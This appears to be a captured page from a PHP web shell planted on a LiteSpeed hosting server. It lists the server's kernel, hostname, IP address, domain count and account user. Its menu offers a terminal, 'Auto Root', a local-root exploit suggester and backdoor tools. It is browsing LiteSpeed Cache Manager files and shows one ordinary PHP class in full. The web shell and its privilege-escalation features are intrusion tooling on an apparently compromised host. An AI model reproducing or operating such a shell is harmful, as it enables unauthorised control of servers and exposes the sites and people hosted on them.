Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
webcachemgr /
src /
Context /
Delete
Unzip
Name
Size
Permission
Date
Action
Context
[ DIR ]
drwxr-xr-x
2025-02-25 04:01
Context.php
8.41
KB
-rw-r--r--
2025-02-25 04:01
ContextOption.php
5.48
KB
-rw-r--r--
2025-02-25 04:01
RootCLIContextOption.php
905
B
-rw-r--r--
2025-02-25 04:01
RootPanelContextOption.php
1.17
KB
-rw-r--r--
2025-02-25 04:01
UserCLIContextOption.php
1.06
KB
-rw-r--r--
2025-02-25 04:01
Save
Rename
<?php /** ****************************************** * LiteSpeed Web Server Cache Manager * * @author LiteSpeed Technologies, Inc. (https://www.litespeedtech.com) * @copyright (c) 2018 * ******************************************* */ namespace Lsc\Wp\Context; use \Lsc\Wp\Context\ContextOption; use \Lsc\Wp\Logger; class RootCLIContextOption extends ContextOption { public function __construct() { $invokerName = 'lscmctl'; $invokerType = parent::FROM_CLI; $isRoot = parent::IS_ROOT; $logFileLvl = Logger::L_INFO; $logEchoLvl = Logger::L_INFO; $bufferedWrite = true; $bufferedEcho = false; parent::__construct($invokerName, $invokerType, $isRoot, $logFileLvl, $logEchoLvl, $bufferedWrite, $bufferedEcho); $this->scanDepth = 2; $this->batchTimeout = 0; $this->batchSize = 0; } }